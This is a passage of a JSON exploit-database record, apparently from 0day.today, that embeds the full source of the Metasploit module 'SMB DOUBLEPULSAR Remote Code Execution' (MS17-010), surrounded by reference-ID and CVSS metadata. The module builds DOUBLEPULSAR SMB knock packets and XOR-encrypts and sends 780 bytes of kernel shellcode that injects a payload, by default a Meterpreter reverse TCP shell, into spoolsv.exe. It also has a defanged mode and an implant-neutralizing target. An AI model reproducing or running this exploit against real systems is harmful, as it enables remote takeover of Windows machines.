"kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-11T00:22:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-11T00:22:25", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-11T00:22:25", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "94e960b65143f7cbb091143830bc3042", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-12T10:30:13", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T10:30:13", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-12T10:30:13", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": 